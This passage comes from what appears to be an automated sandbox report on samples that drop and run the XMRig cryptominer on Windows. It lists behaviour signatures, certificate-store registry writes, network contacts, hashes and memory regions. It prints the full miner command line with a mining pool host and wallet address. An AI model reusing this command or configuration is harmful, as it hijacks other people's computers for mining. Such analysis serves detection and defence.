f040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4892 wrote to memory of 5044 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4892 wrote to memory of 5044 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.136.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.98.74.40.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/5044-16-0x0000021BC49B0000-0x0000021BC49D0000-memory.dmp
memory/5044-17-0x0000021BC4A00000-0x0000021BC4A20000-memory.dmp
memory/5044-18-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-19-0x0000021BC4A20000-0x0000021BC4A40000-memory.dmp
memory/5044-20-0x0000021BC4A40000-0x0000021BC4A60000-memory.dmp
memory/5044-21-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-22-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-25-0x0000021BC4A40000-0x0000021BC4A60000-memory.dmp
memory/5044-24-0x0000021BC4A20000-0x0000021BC4A40000-memory.dmp
memory/5044-23-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-26-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-27-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-28-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-29-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-30-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-31-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-32-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-33-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-34-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-35-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-36-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-37-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-38-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-39-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-40-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-41-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-42-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-43-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-44-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-45-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-46-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-47-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-48-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-49-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-50-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-51-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-52-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-53-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-54-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-55-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-56-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-57-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-58-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-59-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-60-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-61-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-62-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-63-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-64-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-65-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-66-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-67-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-68-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-69-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-70-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-71-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-72-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-73-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-74-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-75-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-76-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-77-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-78-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-79-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-80-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-81-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-82-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-83-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
memory/5044-84-0x00007FF647DF0000-0x00007FF6488F3000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 17:56
Platform
win10v2004-20240508-en
Max time kernel
1799s
Max time network
1795s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3452 wrote to memory of 1000 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3452 wrote to memory of 1000 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1000-16-0x00000194F8770000-0x00000194F8790000-memory.dmp
memory/1000-17-0x00000194F8A10000-0x00000194F8A30000-memory.dmp
memory/1000-18-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-20-0x00000194FA300000-0x00000194FA320000-memory.dmp
memory/1000-19-0x00000194FA2E0000-0x00000194FA300000-memory.dmp
memory/1000-21-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-22-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-25-0x00000194FA300000-0x00000194FA320000-memory.dmp
memory/1000-24-0x00000194FA2E0000-0x00000194FA300000-memory.dmp
memory/1000-23-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-26-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-27-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-28-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-29-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-30-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-31-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-32-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-33-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-34-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-35-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-36-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-37-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-38-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-39-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-40-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-41-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-42-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-43-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-44-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-45-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-46-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-47-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-48-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-49-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-50-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-51-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-52-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-53-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-54-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-55-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-56-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-57-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-58-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-59-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-60-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-61-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-62-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-63-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-64-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-65-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-66-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-67-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-68-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-69-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-70-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-71-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-72-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-73-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-74-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-75-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-76-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-77-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-78-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-79-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-80-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-81-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-82-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-83-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
memory/1000-84-0x00007FF6AFAA0000-0x00007FF6B05A3000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 18:00
Platform
win10v2004-20240426-en
Max time kernel
1792s
Max time network
1787s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53